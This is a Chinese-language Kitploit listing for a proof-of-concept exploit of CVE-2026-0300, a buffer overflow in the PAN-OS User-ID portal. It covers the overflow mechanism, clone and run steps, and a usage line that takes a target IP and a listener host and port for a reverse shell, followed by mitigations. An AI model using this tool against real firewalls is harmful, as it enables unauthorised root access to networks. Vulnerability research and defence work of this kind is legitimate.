Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-0300-POC — CVE-2026-0300 的概念验证,这是 PAN-OS User-ID Portal 中的一个严重缓冲区溢出漏洞,可导致未经身份验证的远程代码执行并获得 root 权限。 | Kitploit
工具/GitHubGitHub/p3nt3st3r-star/cve-2026-0300-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubp3nt3st3r-star/cve-2026-0300-poc

CVE-2026-0300-POC

CVE-2026-0300 的概念验证,这是 PAN-OS User-ID Portal 中的一个严重缓冲区溢出漏洞,可导致未经身份验证的远程代码执行并获得 root 权限。

查看仓库
21113个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🛡️ CVE-2026-0300:PAN-OS User-ID™ 门户远程代码执行分析

研究概念验证:CWE-787 越界写入

Security Python License Dependencies

📌 概述

CVE-2026-0300 是在 Palo Alto Networks PAN-OS User-ID™ 身份验证门户(强制门户)中发现的一个高危缓冲区溢出漏洞。本研究仓库演示了该漏洞的技术逻辑,重点说明未认证的网络数据包如何导致以 root 权限执行远程代码执行(RCE)。


📊 漏洞详情

特性详情
CVE 编号CVE-2026-0300
严重性评分9.3(严重)
弱点类型CWE-787:越界写入
攻击向量网络(未认证)
所需权限无
用户交互无
受影响软件PAN-OS 12.1、11.2、11.1、10.2

🔬 技术机制

该漏洞源于 User-ID 身份验证门户服务在将传入数据写入内存缓冲区之前未能验证其长度。

  1. 缓冲区: 该服务分配一个固定大小的内存区域用于处理门户请求。
  2. 溢出: 精心构造的 POST 请求发送超过此大小的载荷。
  3. 覆盖: 多余数据覆盖堆栈/堆,使攻击者能够控制**指令指针(EIP/RIP)**并执行任意 shellcode。

🛠️ 安装与设置

1. 前提条件

  • Python 3.9 或更高版本。
  • 无需外部库(使用标准 socket、struct 和 argparse)。

2. 克隆研究工具

克隆仓库

root@kitploit:~
git clone https://github.com/p3Nt3st3r-sTAr/CVE-2026-0300-POC.git

进入文件夹

root@kitploit:~
cd CVE-2026-0300-POC

使脚本可执行

root@kitploit:~
chmod +x research_poc.py

🚀 使用指南

该工具采用专业的 CLI(命令行界面)设计。

基本命令

root@kitploit:~
python3 research_poc.py -t <TARGET_IP> --lhost <LISTEN_IP> -L <LISTEN_PORT>

高级参数

标志名称描述默认值
-t--target(必需) 防火墙的目标 IP 地址。无
-p--port运行 User-ID 门户的端口。6082
-o--offset到达内存溢出点的字节长度。2048
-r--ret十六进制返回地址。0xdeadbeef
-l--lhost反弹 shell IP 地址您的 IP
-L--lport您的监听端口4444

🛡️ 缓解与安全措施

  • 更新 PAN-OS: 安装最新的安全补丁(2026 年 5 月发布)。
  • IP 限制: 将门户访问限制为受信任的内部 IP 区域。
  • 禁用门户: 如果不需要 User-ID 身份验证,请禁用该功能。

⚠️ 道德与法律免责声明

仅供教育和授权研究使用。 对您不拥有的系统进行未经授权的测试是违法的。作者不对任何滥用此研究代码的行为负责。请负责任地使用,以提升全球安全性。 开发者: https://t.me/p3Nt3st3rsTAr 漏洞发现日期: 2026 年 5 月 7 日

下载工具